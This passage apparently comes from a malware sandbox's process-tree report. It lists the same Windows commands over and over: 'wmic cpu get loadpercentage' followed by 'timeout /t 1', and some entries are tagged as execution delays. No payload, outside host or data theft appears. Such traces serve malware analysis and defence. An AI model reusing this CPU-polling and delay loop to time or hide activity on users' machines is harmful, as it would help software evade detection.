    3⤵
    PID:1652
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4448
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2504
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3332
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2348
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1008
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3816
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4848
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1824
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3596
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3112
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5032
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4988
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3964
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4840
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:912
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4884
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3960
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:536
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4972
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4720
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4888
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4728
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3836
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2080
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4832
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3640
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1132
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4172
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5104
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3456
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3692
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3604
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3416
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4416
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3592
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2592
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3636
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2968
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1452
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4252
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:960
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4612
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4388
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3612
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2040
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2060
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4292
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:396
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4888
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2496
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2604
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2488
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2672
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3440
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4312
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1064
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3228
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3404
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1656
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1816
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3616
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1184
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4224
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:744
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3624
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3412
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4480
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1368
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4276
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:5084
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1544
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:748
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3664
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:944
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1460
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5076
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2272
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2524
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2568
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2352
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5060
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2364
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4196
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4192
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4720
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4616
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:628
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2444
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:5012
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2916
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2604
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4448
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:656
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1596
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4172
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4404
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1904
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1668
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:632
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4316
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1396
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5024
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:2984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1464
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4036
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1384
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1540
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4480
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4108
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3996
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1780
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2920
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:432
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3680
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1852
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2256
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2748
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2652
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1376
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4092
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3668
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1496
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:1456
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4716
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3916
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3700
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1972
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4920
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:5000
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2792
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:400
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4288
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4876
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:4384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2116
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2476
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2304
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4940
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1740
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2572
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:408
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:1500
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2428
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4212
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3936
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2676
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:532
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4864
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:1472
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3228
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3136
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3148
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:2664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2556
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4248
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4484
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:2436
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2036
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:116
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:4848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:3896
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4516
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:4800
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:3372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  PID:3060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
  2⤵
  PID:2820
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get loadpercentage
    3⤵
    PID:4440
